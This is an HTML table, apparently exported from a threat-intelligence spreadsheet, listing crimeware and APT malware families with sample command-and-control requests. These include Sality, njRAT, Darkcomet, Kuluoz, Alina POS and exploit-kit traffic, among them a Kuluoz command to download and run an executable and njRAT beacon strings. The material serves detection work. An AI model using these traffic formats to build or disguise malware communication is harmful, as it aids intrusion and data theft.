<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Mudrop"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Mudrop</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/gcs?alpha=YBvfs8NDNYK3vSEO+ p6fL2KZts4yS8inp2oWpqiDOinE/IJmP6Ktx9+Px+c="]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/gcs?alpha=YBvfs8NDNYK3vSEO+ p6fL2KZts4yS8inp2oWpqiDOinE/IJmP6Ktx9+Px+c=</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"ChePro (Brazil.banker)"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">ChePro (Brazil.banker)</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/ini/xvwmmwb.mod"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/ini/xvwmmwb.mod</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Cryptolocker"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Cryptolocker</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/home/"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/home/</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Reedum"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Reedum</span></td><td style="padding: 2px 3px 2px 3px; vertical-align: bottom;"></td><td data-sheets-value="[null,2,"220 ProFTPD 1.3.3a Server (Debian) [::ffff:109.234.159.254]"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">220 ProFTPD 1.3.3a Server (Debian) [::ffff:109.234.159.254]</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Vidgrab"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Vidgrab</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"(172.16.253.130)|1067|WinXP|D|L|No| 0..0....1..52..|No|V2010-v24|2184|0|3111947|0|1|."]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">(172.16.253.130)|1067|WinXP|D|L|No| 0..0....1..52..|No|V2010-v24|2184|0|3111947|0|1|.</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Page / stscout / Elise / lStudio / Wumins"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Page / stscout / Elise / lStudio / Wumins</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/29af9cdc/page_12082223.html"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/29af9cdc/page_12082223.html</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Tijcont"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Tijcont</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/s/blog_b2afd7fe01019tkf.htm"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/s/blog_b2afd7fe01019tkf.htm</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Darkcomet"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Darkcomet</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/a.php?id=c2ViYWxpQGxpYmVyby5pdA=="]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/a.php?id=c2ViYWxpQGxpYmVyby5pdA==</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Kelihos"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Kelihos</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/index.htm"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/index.htm</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Kuluoz Run command from C2"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Kuluoz Run command from C2</span></td><td data-sheets-value="[null,2,"n"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">n</span></td><td data-sheets-value="[null,2,"c=run&u=/get/7d2c37d2070e1b38 6070db8c851dae08.exe&crc= 9e2b9c4f465 b765fc971423935c4b68e"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">c=run&u=/get/7d2c37d2070e1b38 6070db8c851dae08.exe&crc= 9e2b9c4f465 b765fc971423935c4b68e</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"njRAT / Backdoor.LV"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">njRAT / Backdoor.LV</span></td><td style="padding: 2px 3px 2px 3px; vertical-align: bottom;"></td><td data-sheets-value="[null,2," lv|'|'|TndfQzQyNjRFQkI=|'|'|VICTIM|'|'| Examiner|'|'|2013-06-21|'|'|USA|'|'| Win XP ProfessionalSP2 ...\n\n 171.ll|'|'|Li4uLi4uLk5FVy4uLi4u Li4uX0F FNTJDMzdE|'|'|SENTA|'|'| sentai55|'|'|15-01-29|'|'||'|'| Win 8.1SP0 x64|'|'|Yes|'|'|0.7d| '|'|..|'|'||'|'|b88ece4c04f706 c9717bbe6fb da49ed2,132.inf|'|'|Li4uLi4uLk5FVy4uL i4uLi4uDQpyZWVlZWVk LmR5bmRucy5iaXo6M jUyNTQNCkFwcERhdGENCldpbnJhci5leG UNClRydWUNCkZhbHNlDQpU cnVlDQpGYWxzZQ==0.\n\n 251.ll|'|'|Li4uLi4uLk5FVy4uLi4uLi4uX0FFNTJD MzdE|'|'|SENTA|'|'|sentai55|'|'|15-01-29|'|'||'|'|Win 8.1SP0 x64|'|'|Yes|'|'|0.7d|'|'|..|'|'|QnVyd 2VsbCB2LiBIb2JieSBMb2JieSBBYnJpZGdlZCBbQ29tcGF0aWJpbGl0eSBNb 2RlXSAtIFdvcmQA|'|'|b88ece4c04f706c9717bbe6fbda49ed2,\n\nlv|'|'|VHJvamFuX0M0NkY2RTk= |'|'|MARK|'|'|user |'|'|2013-11-22|'|'||'|'|Win XP|'|'|No|'|'|0.6.4|'|'|..|'|'||'|'|[endof]"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;"> lv|'|'|TndfQzQyNjRFQkI=|'|'|VICTIM|'|'| Examiner|'|'|2013-06-21|'|'|USA|'|'| Win XP ProfessionalSP2 ...<br /><br /> 171.ll|'|'|Li4uLi4uLk5FVy4uLi4u Li4uX0F FNTJDMzdE|'|'|SENTA|'|'| sentai55|'|'|15-01-29|'|'||'|'| Win 8.1SP0 x64|'|'|Yes|'|'|0.7d| '|'|..|'|'||'|'|b88ece4c04f706 c9717bbe6fb da49ed2,132.inf|'|'|Li4uLi4uLk5FVy4uL i4uLi4uDQpyZWVlZWVk LmR5bmRucy5iaXo6M jUyNTQNCkFwcERhdGENCldpbnJhci5leG UNClRydWUNCkZhbHNlDQpU cnVlDQpGYWxzZQ==0.<br /><br /> 251.ll|'|'|Li4uLi4uLk5FVy4uLi4uLi4uX0FFNTJD MzdE|'|'|SENTA|'|'|sentai55|'|'|15-01-29|'|'||'|'|Win 8.1SP0 x64|'|'|Yes|'|'|0.7d|'|'|..|'|'|QnVyd 2VsbCB2LiBIb2JieSBMb2JieSBBYnJpZGdlZCBbQ29tcGF0aWJpbGl0eSBNb 2RlXSAtIFdvcmQA|'|'|b88ece4c04f706c9717bbe6fbda49ed2,<br /><br />lv|'|'|VHJvamFuX0M0NkY2RTk= |'|'|MARK|'|'|user |'|'|2013-11-22|'|'||'|'|Win XP|'|'|No|'|'|0.6.4|'|'|..|'|'||'|'|[endof]</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Chimerka.1 / Refyes.A"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Chimerka.1 / Refyes.A</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/sys.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/sys.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Sality"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Sality</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/images/logos.gif?1f5428=8212640"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/images/logos.gif?1f5428=8212640</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Nitedrem"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Nitedrem</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/down.asp?action=install&u=cpmcpm&p= 2366A64BAA384EA6AB9CEF73E8E2BE12&t =7393"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/down.asp?action=install&u=cpmcpm&p= 2366A64BAA384EA6AB9CEF73E8E2BE12&t =7393</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Nitedrem"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Nitedrem</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/upx/kod.txt?k=123&t=7215"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/upx/kod.txt?k=123&t=7215</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Nitedrem"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Nitedrem</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"...............2817324n-79s4-43q8-8n2n-676s3qr1ops5:..............."]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">...............2817324n-79s4-43q8-8n2n-676s3qr1ops5:...............</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Nitedrem"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Nitedrem</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/config.txt?&t=4593"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/config.txt?&t=4593</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Nitedrem"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Nitedrem</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/fish.jpg?&t=4426"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/fish.jpg?&t=4426</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Sality"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Sality</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/?12da89=12355930"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/?12da89=12355930</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Sality"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Sality</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/images/logos.gif?114bbc=9068000"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/images/logos.gif?114bbc=9068000</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Sality"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Sality</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/setting.doc"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/setting.doc</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Torpig /Sinowal miniloader"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Torpig /Sinowal miniloader</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Torpig /Sinowal miniloader"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Torpig /Sinowal miniloader</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/search2?fr=altavista&itag=ody&q= b88d6ce7e9fe419788716298cc747adc %2C93a5d8146fea0bbb&kgs=1&kls=0"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/search2?fr=altavista&itag=ody&q= b88d6ce7e9fe419788716298cc747adc %2C93a5d8146fea0bbb&kgs=1&kls=0</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"EK Popads"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">EK Popads</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/?7d456d68729292e9843cb9dde2d2f7b4=34"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/?7d456d68729292e9843cb9dde2d2f7b4=34</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"EK Popads"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">EK Popads</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/4d23ccceb2cf9e6c1c91df06170259d3/32cd ad27bdec4a68d8efc9bb835008e6.swf"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/4d23ccceb2cf9e6c1c91df06170259d3/32cd ad27bdec4a68d8efc9bb835008e6.swf</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"EK Popads"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">EK Popads</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/855feed4acbb99c63ad7f25fef289284/decaff5b6ee 641742f53d8ef8c6f9a16.jar"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/855feed4acbb99c63ad7f25fef289284/decaff5b6ee 641742f53d8ef8c6f9a16.jar</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"EK Popads"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">EK Popads</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/?c480cfaa684e1dc0db1b2e1f891d814a= a15&8524421677ca0f8c20fd1cd2c1c6e0a7=sansit.in"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/?c480cfaa684e1dc0db1b2e1f891d814a= a15&8524421677ca0f8c20fd1cd2c1c6e0a7=sansit.in</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"EK Popads"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">EK Popads</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/39ff9ff8c3b603d8eed017df64dd2799.eot"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/39ff9ff8c3b603d8eed017df64dd2799.eot</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Alina POS v5.6"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Alina POS v5.6</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/duck/push.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/duck/push.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Alina POS v5.6"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Alina POS v5.6</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/adobe/version_check.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/adobe/version_check.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Alina POS v6.0"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Alina POS v6.0</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/adobe/version_check.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/adobe/version_check.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT (IN)"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT (IN)</span></td><td data-sheets-value="[null,2,"Hanove / Tourist"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Hanove / Tourist</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/kamp.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/kamp.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Surtr 2nd Stage DL"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Surtr 2nd Stage DL</span></td><td style="padding: 2px 3px 2px 3px; vertical-align: bottom;"></td><td data-sheets-value="[null,2,"00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Surtr 2nd Stage DL"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Surtr 2nd Stage DL</span></td><td style="padding: 2px 3px 2px 3px; vertical-align: bottom;"></td><td data-sheets-value="[null,2,"00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Surtr Initial GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Surtr Initial GET</span></td><td style="padding: 2px 3px 2px 3px; vertical-align: bottom;"></td><td data-sheets-value="[null,2,"00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Taleret"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Taleret</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Taleret"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Taleret</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/jw!Dyz0_2mTExQ0xbBnlp.RZcXoHmU-"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/jw!Dyz0_2mTExQ0xbBnlp.RZcXoHmU-</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Sweet Orange EK"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Sweet Orange EK</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/in.php?q=WPOChVXlw9QiOTwtCbg+ uSk36elyOCiUwI99U0PYxA=="]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/in.php?q=WPOChVXlw9QiOTwtCbg+ uSk36elyOCiUwI99U0PYxA==</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"ArcomRat / Dokstormac"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">ArcomRat / Dokstormac</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"S_0001[!^]NEW[!^]127.0.0.1[!^]COMPUTERNAME[!^] username[!^]XP[!^]V1.3[!^]IDLE TIME[!^]Active Caption [!^]SPiBlnbspkvj6DQ5dnFrtvvJvNT4a8Y[!^]NO[!^]NO[!^]NO[!^][!^]"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">S_0001[!^]NEW[!^]127.0.0.1[!^]COMPUTERNAME[!^] username[!^]XP[!^]V1.3[!^]IDLE TIME[!^]Active Caption [!^]SPiBlnbspkvj6DQ5dnFrtvvJvNT4a8Y[!^]NO[!^]NO[!^]NO[!^][!^]</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Ardamax keylogger"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Ardamax keylogger</span></td><td data-sheets-value="[null,2,"SMTP"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">SMTP</span></td><td data-sheets-value="[null,2,"220 smtp.mail.yahoo.com ESMTP ready\nEHLO DELLXT\n250-smtp.mail.yahoo.com"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">220 smtp.mail.yahoo.com ESMTP ready<br />EHLO DELLXT<br />250-smtp.mail.yahoo.com</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Matsnu - MBR wiping ransomware"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Matsnu - MBR wiping ransomware</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/f44/myse.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/f44/myse.php</span></td></tr>
